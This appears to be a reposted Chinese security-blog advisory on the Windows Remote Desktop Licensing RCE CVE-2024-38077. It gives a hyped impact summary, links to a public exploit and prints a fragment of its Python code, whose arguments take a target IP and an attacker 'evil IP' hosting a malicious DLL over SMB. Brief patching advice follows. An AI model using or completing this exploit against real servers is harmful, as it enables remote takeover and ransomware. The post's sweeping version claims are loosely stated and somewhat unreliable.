windows核弹级RCE漏洞(CVE-2024-38077)

admin 2024年8月9日16:55:19评论119 views字数 1783阅读5分56秒阅读模式

windows核弹级RCE漏洞(CVE-2024-38077)

漏洞影响:

该漏洞存在于Windows远程桌面的许可管理服务(RDL)中,攻击者无需任何条件,无需用户交互,可直接获取服务器最高权限执行任意操作。漏洞影响Windows Server 2000到 2025所有版本,存在近30年。

该漏洞可稳定利用、可远控、可勒索、可蠕虫等,破坏力极大,攻击者无须任何权限即可实现远程代码执行。

漏洞基本条件:

开启 Windows Remote Desktop Licensing (RDL)

 

漏洞检测exp:

只发布代码片段,有需要的可以去github获取。

来源:https://github.com/qi4L/CVE-2024-38077/tree/master

import
struct, hashlib, argparse
from time import sleep
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.dcerpc.v5.ndr import NDRUniConformantArray, NDRPOINTER, NDRSTRUCT, NDRCALL, NDR
from impacket.dcerpc.v5.dtypes import BOOL, ULONG, DWORD, PULONG, PWCHAR, PBYTE, WIDESTR, UCHAR, WORD, LPSTR, \
    PUINT, WCHAR
from impacket.uuid import uuidtup_to_bin
from Cryptodome.Util.number import bytes_to_long
from wincrypto import CryptEncrypt, CryptImportKey

UUID = uuidtup_to_bin(("3d267954-eeb7-11d1-b94e-00c04fa3080d", "1.0"))
TRY_TIMES = 3
SLEEP_TIME = 210
DESCRIPTION = "MadLicense: Windows Remote Desktop Licensing Service Preauth RCE"
dce = None
rpctransport = None
ctx_handle = None
handle_lists = []
leak_idx = 0
heap_base = 0
ntdll_base = 0
peb_base = 0
pe_base = 0
rpcrt4_base = 0
kernelbase_base = 0
BBYTE = UCHAR


if __name__ == '__main__':
    parse = argparse.ArgumentParser(description=DESCRIPTION)
    parse.add_argument("--target_ip", type=str, required=True, help="Target IP, eg: 192.168.120.1")
    parse.add_argument("--evil_ip", type=str, required=True, help="Evil IP, eg: 192.168.120.2")
    parse.add_argument("--evil_dll_path", type=str, required=False, default="\\smb\\evil_dll.dll",
                       help="Evil dll path, eg: \\smb\\evil_dll.dll")
    parse.add_argument("--check_vuln_exist", type=bool, required=False, default=False,
                       help="Check vulnerability exist before exploit")
    args = parse.parse_args()
    pwn(args.target_ip, args.evil_ip, args.evil_dll_path, args.check_vuln_exist)


修复建议:
微软官方已发布针对该漏洞的修复方案,打补丁

自查方式:
检查系统版本
“运行”,输入“winver”后执行确定,检查对应系统版本是否存在此漏洞

原文始发于微信公众号(信安王子):windows核弹级RCE漏洞(CVE-2024-38077)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月9日16:55:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   windows核弹级RCE漏洞(CVE-2024-38077)https://cn-sec.com/archives/3049556.html

发表评论

匿名网友 填写信息